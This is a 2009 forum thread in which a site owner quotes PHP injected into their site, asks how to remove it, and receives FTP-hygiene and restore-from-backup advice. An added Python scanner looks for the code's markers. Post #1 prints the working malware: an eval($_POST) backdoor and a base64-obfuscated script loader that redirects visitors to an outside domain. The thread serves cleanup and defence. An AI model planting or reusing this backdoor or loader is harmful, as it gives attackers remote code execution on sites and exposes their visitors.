Infection

Discussion in 'Programming' started by pop2009, May 20, 2009.

  1. #1
    My site was infected with this code. I see it redirects to martuz.cn. How can I protect my site in the future? To remove this, is there an automatic way, or do I have to delete it manually from my site?
    This is the code:
    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
    if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',
    base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0g
    CihmdW5jdGlvbihnalVuayl7dmFyIGxOQTg9KCd2ITYxciEyMGEhM2QhMjJTY3J
    pcHRFITZlZ2luZSEyMiEyYyE2MiEzZCEyMiE1NiE2NSE3MnMhNjlvbigpKyEyMiEy
    YyE2YSEzZCEyMiEyMiEyY3UhM2RuYXZpZ2F0b3IhMmUhNzVzZXIhNDFnZW4h
    NzQhM2IhNjlmKCghNzUhMmVpbmRleE8hNjYhMjghMjIhNDNociE2ZiE2ZGUhMj
    IpITNjMCkhMjYhMjYodSEyZWluZGV4ITRmITY2KCEyMiE1N2luITIyKSEzZSEz
    MCEyOSEyNiEyNih1ITJlaW4hNjRleE8hNjYoITIyTiE1NCEyMDYhMjIhMjkhM2Mh
    MzApITI2ITI2KCE2NCE2ZmMhNzVtZW50ITJlY28hNmZraWUhMmVpbmQhN
    jV4TyE2NighMjJtITY5ZWshM2QxITIyKSEzYzAhMjkhMjYhMjYodHlwZSE2ZiE2N
    iEyOHpydnohNzRzITI5ITIxITNkdHlwZW9mKCEyMkEhMjIpKSkhN2IhN2FyITc2
    enQhNzMhM2QhMjIhNDEhMjIhM2JldiE2MWwhMjghMjJpITY2KHdpbmQhNmY
    hNzchMmUhMjIrITYxKyEyMikhNmEhM2RqKyEyMithKyEyMiE0ZGEhNmEhNmZ
    yITIyK2IrYSEyYiEyMk1pbm8hNzIhMjIrYiEyYiE2MSshMjJCdWlsZCEyMiEyYmIrIT
    IyaiEzYiEyMiEyOSEzYmRvY3VtZW50ITJld3JpdCE2NSghMjIhM2NzY3IhNjlwdC
    EyMHNyITYzITNkITJmITJmbWEhNzIhMjIrITIyITc0ITc1eiEyZWNuITJmdmlkITJ
    mITNmITY5ZCEzZCEyMitqITJiITIyITNlITNjITVjITJmITczY3IhNjlwdCEzZSEyMik
    hM2IhN2QnKS5yZXBsYWNlKGdqVW5rLCclJyk7dmFyIHF0VVY9dW5lc2NhcGU
    obE5BOCk7ZXZhbChxdFVWKX0pKC9cIS9nKTsKIC0tPjwvc2NyaXB0Pg=='));
     
    pop2009, May 20, 2009
  2. nikes

    #2
    Most likely this exploit is caused by compromised FTP credentials. So start with your own computer. Scan it for spyware. Some people reported good results with Malwarebytes.

    Then (from a clean computer) change FTP passwords.

    Try not to store them inside programs that you use to upload files to a server.

    Whenever possible use secure connections. I.e. use SFTP instead of plain FTP. Many shared hosting plans include SFTP.

    Finally, remove the malicious code from all server files (.html, .php, .js, etc.). The easiest way to do it is to replace them with clean files from a backup.
    nikes, May 21, 2009
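
A read-only scan for the PHP injection quoted in post #1, as an added example that is not part of the thread: it lists files under a web root that contain the `eval($_POST[...])` backdoor, the `tmp_` function guard, or the `TMP_` base64 constant, so they can be replaced from a clean backup. The function names, the constructed sample bytes, and the idea that the suffix after `tmp_`/`TMP_` varies between infections are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Markers taken from the snippet in post #1. The suffixes seen there
# (tmp_lkojfghx, TMP_XHGFJOKL) are assumed to vary per infection, so the
# patterns accept any identifier after the tmp_/TMP_ prefix.
MARKERS = {
    "post-eval backdoor": re.compile(
        rb"eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\s*\["),
    "tmp_ function guard": re.compile(
        rb"function_exists\s*\(\s*['\"]tmp_\w+['\"]\s*\)"),
    "base64 payload constant": re.compile(
        rb"define\s*\(\s*['\"]TMP_\w+['\"]\s*,\s*base64_decode\s*\("),
}
EXTENSIONS = {".php", ".html", ".htm", ".js"}  # file types named in post #2

# Constructed sample with the same shape as the posted code; the identifiers
# and the base64 string ("ABC") are placeholders, not the real payload.
SAMPLE_INFECTED = (
    b"<?php if(!function_exists('tmp_abc')){if(isset($_POST['tmp_abc3']))"
    b"eval($_POST['tmp_abc3']);\nif(!defined('TMP_CBA'))define('TMP_CBA',\n"
    b"base64_decode('QUJD'));"
)

def scan_bytes(data):
    """Return the names of all markers found in one file's contents."""
    return [name for name, rx in MARKERS.items() if rx.search(data)]

def scan_tree(root):
    """Map each suspicious file under root to the markers it matched."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            found = scan_bytes(path.read_bytes())
            if found:
                hits[str(path)] = found
    return hits

if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for file, found in scan_tree(root).items():
        print(f"{file}: {', '.join(found)}")
```

The scan only reports matches and does not modify files; it recognises the PHP form shown in post #1, not other variants of the injection.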
  3. pop2009

    #3
    Thank you, nikes. Can you tell me what martuz.cn is? I see my site is redirected first to martuz.cn. What does martuz.cn do? Steal traffic, clicks on AdSense, or ...?
     
    pop2009, May 21, 2009